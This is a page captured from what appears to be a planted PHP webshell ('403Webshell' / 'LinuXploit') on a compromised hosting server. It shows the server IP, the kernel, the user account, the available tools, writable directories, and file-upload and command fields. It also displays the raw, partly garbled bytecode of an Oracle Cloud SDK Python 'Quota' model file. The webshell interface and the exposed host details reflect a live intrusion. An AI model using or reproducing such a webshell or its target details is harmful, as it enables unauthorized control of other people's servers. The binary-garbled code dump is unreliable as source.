403Webshell
Server IP : 162.241.203.86  /  Your IP : 216.73.216.191
Web Server : Apache
System : Linux br1002.hostgator.com.br 5.14.0-687.36.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 7 05:40:49 EDT 2026 x86_64
User : luxlic01 ( 6532)
PHP Version : 8.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/python3.9/site-packages/oci/limits/models/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib/python3.9/site-packages/oci/limits/models/__pycache__/quota.cpython-39.pyc
a

���fd0�@s8ddlmZmZmZddlmZeGdd�de��ZdS)�)�formatted_flat_dict�
NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc@s8eZdZdZdZdd�Zedd��Zejdd��Zedd	��Z	e	jd
d	��Z	edd��Z
e
jd
d��Z
edd��Zejdd��Zedd��Zejdd��Zedd��Z
e
jdd��Z
edd��Zejdd��Zedd��Zejdd��Zedd��Zejdd��Zed d!��Zejd"d!��Zd#d$�Zd%d&�Zd'd(�Zd)S)*�Quotaa4
    Quotas are applied on top of the service limits and inherited through the nested compartment hierarchy.
    Quotas allow compartment admins to limit resource consumption and set boundaries around acceptable resource use.
    The term "quota" can be interpreted as the following:
    * An individual statement written in the declarative language.
    * A collection of statements in a single, named "quota" object (which has an Oracle Cloud ID (OCID) assigned to it).
    * The overall body of quotas your organization uses to control access to resources.
    �ACTIVEcKsxddddddddddd�
|_dd	d
ddd
ddddd�
|_d|_d|_d|_d|_d|_d|_d|_d|_	d|_
d|_dS)a�
        Initializes a new Quota object with values from keyword arguments.
        The following keyword arguments are supported (corresponding to the getters/setters of this class):

        :param id:
            The value to assign to the id property of this Quota.
        :type id: str

        :param compartment_id:
            The value to assign to the compartment_id property of this Quota.
        :type compartment_id: str

        :param name:
            The value to assign to the name property of this Quota.
        :type name: str

        :param statements:
            The value to assign to the statements property of this Quota.
        :type statements: list[str]

        :param locks:
            The value to assign to the locks property of this Quota.
        :type locks: list[oci.limits.models.ResourceLock]

        :param description:
            The value to assign to the description property of this Quota.
        :type description: str

        :param time_created:
            The value to assign to the time_created property of this Quota.
        :type time_created: datetime

        :param lifecycle_state:
            The value to assign to the lifecycle_state property of this Quota.
            Allowed values for this property are: "ACTIVE", 'UNKNOWN_ENUM_VALUE'.
            Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
        :type lifecycle_state: str

        :param freeform_tags:
            The value to assign to the freeform_tags property of this Quota.
        :type freeform_tags: dict(str, str)

        :param defined_tags:
            The value to assign to the defined_tags property of this Quota.
        :type defined_tags: dict(str, dict(str, object))

        �strz	list[str]zlist[ResourceLock]Zdatetimezdict(str, str)zdict(str, dict(str, object)))
�id�compartment_id�name�
statements�locks�description�time_created�lifecycle_state�
freeform_tags�defined_tagsr	Z
compartmentIdrrr
rZtimeCreatedZlifecycleStateZfreeformTagsZdefinedTagsN)Z
swagger_typesZ
attribute_map�_id�_compartment_id�_name�_statements�_locks�_description�
_time_created�_lifecycle_state�_freeform_tags�
_defined_tags)�self�kwargs�r�;/usr/lib/python3.9/site-packages/oci/limits/models/quota.py�__init__s@1��
zQuota.__init__cCs|jS)z�
        **[Required]** Gets the id of this Quota.
        The OCID of the quota.


        :return: The id of this Quota.
        :rtype: str
        �r�rrrr r	ps
zQuota.idcCs
||_dS)z�
        Sets the id of this Quota.
        The OCID of the quota.


        :param id: The id of this Quota.
        :type: str
        Nr")rr	rrr r	|s
cCs|jS)z�
        **[Required]** Gets the compartment_id of this Quota.
        The OCID of the compartment containing the resource this quota applies to.


        :return: The compartment_id of this Quota.
        :rtype: str
        �rr#rrr r
�s
zQuota.compartment_idcCs
||_dS)z�
        Sets the compartment_id of this Quota.
        The OCID of the compartment containing the resource this quota applies to.


        :param compartment_id: The compartment_id of this Quota.
        :type: str
        Nr$)rr
rrr r
�s
cCs|jS)a
        **[Required]** Gets the name of this Quota.
        The name you assign to the quota during creation. The name must be unique across all quotas
        in the tenancy and cannot be changed.


        :return: The name of this Quota.
        :rtype: str
        �rr#rrr r�sz
Quota.namecCs
||_dS)a
        Sets the name of this Quota.
        The name you assign to the quota during creation. The name must be unique across all quotas
        in the tenancy and cannot be changed.


        :param name: The name of this Quota.
        :type: str
        Nr%)rrrrr r�scCs|jS)z�
        **[Required]** Gets the statements of this Quota.
        An array of one or more quota statements written in the declarative quota statement language.


        :return: The statements of this Quota.
        :rtype: list[str]
        �rr#rrr r�s
zQuota.statementscCs
||_dS)z�
        Sets the statements of this Quota.
        An array of one or more quota statements written in the declarative quota statement language.


        :param statements: The statements of this Quota.
        :type: list[str]
        Nr&)rrrrr r�s
cCs|jS)z�
        Gets the locks of this Quota.
        Locks associated with this resource.


        :return: The locks of this Quota.
        :rtype: list[oci.limits.models.ResourceLock]
        �rr#rrr r
�s
zQuota.lockscCs
||_dS)z�
        Sets the locks of this Quota.
        Locks associated with this resource.


        :param locks: The locks of this Quota.
        :type: list[oci.limits.models.ResourceLock]
        Nr')rr
rrr r
�s
cCs|jS)z�
        **[Required]** Gets the description of this Quota.
        The description you assign to the quota.


        :return: The description of this Quota.
        :rtype: str
        �rr#rrr r�s
zQuota.descriptioncCs
||_dS)z�
        Sets the description of this Quota.
        The description you assign to the quota.


        :param description: The description of this Quota.
        :type: str
        Nr()rrrrr r�s
cCs|jS)a

        **[Required]** Gets the time_created of this Quota.
        Date and time the quota was created, in the format defined by RFC 3339.
        Example: `2016-08-25T21:10:29.600Z`


        :return: The time_created of this Quota.
        :rtype: datetime
        �rr#rrr rszQuota.time_createdcCs
||_dS)a	
        Sets the time_created of this Quota.
        Date and time the quota was created, in the format defined by RFC 3339.
        Example: `2016-08-25T21:10:29.600Z`


        :param time_created: The time_created of this Quota.
        :type: datetime
        Nr))rrrrr rscCs|jS)a�
        Gets the lifecycle_state of this Quota.
        The quota's current state. After creating a quota, make sure its `lifecycleState` is set to
        ACTIVE before using it.

        Allowed values for this property are: "ACTIVE", 'UNKNOWN_ENUM_VALUE'.
        Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.


        :return: The lifecycle_state of this Quota.
        :rtype: str
        )rr#rrr rszQuota.lifecycle_statecCsdg}t||�sd}||_dS)a
        Sets the lifecycle_state of this Quota.
        The quota's current state. After creating a quota, make sure its `lifecycleState` is set to
        ACTIVE before using it.


        :param lifecycle_state: The lifecycle_state of this Quota.
        :type: str
        rZUNKNOWN_ENUM_VALUEN)rr)rrZallowed_valuesrrr r,s
cCs|jS)a�
        Gets the freeform_tags of this Quota.
        Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace.
        For more information, see `Resource Tags`__.
        Example: `{"Department": "Finance"}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :return: The freeform_tags of this Quota.
        :rtype: dict(str, str)
        �rr#rrr r<szQuota.freeform_tagscCs
||_dS)a�
        Sets the freeform_tags of this Quota.
        Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace.
        For more information, see `Resource Tags`__.
        Example: `{"Department": "Finance"}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :param freeform_tags: The freeform_tags of this Quota.
        :type: dict(str, str)
        Nr*)rrrrr rLscCs|jS)a�
        Gets the defined_tags of this Quota.
        Defined tags for this resource. Each key is predefined and scoped to a namespace.
        For more information, see `Resource Tags`__.
        Example: `{"Operations": {"CostCenter": "42"}}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :return: The defined_tags of this Quota.
        :rtype: dict(str, dict(str, object))
        �rr#rrr r\szQuota.defined_tagscCs
||_dS)a�
        Sets the defined_tags of this Quota.
        Defined tags for this resource. Each key is predefined and scoped to a namespace.
        For more information, see `Resource Tags`__.
        Example: `{"Operations": {"CostCenter": "42"}}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :param defined_tags: The defined_tags of this Quota.
        :type: dict(str, dict(str, object))
        Nr+)rrrrr rlscCst|�S�N)rr#rrr �__repr__|szQuota.__repr__cCs|durdS|j|jkS)NF)�__dict__�r�otherrrr �__eq__szQuota.__eq__cCs
||kSr,rr/rrr �__ne__�szQuota.__ne__N)�__name__�
__module__�__qualname__�__doc__ZLIFECYCLE_STATE_ACTIVEr!�propertyr	�setterr
rrr
rrrrrr-r1r2rrrr rs\U



















rN)Zoci.utilrrrZoci.decoratorsr�objectrrrrr �<module>s

Youez - 2016 - github.com/yon3zu
LinuXploit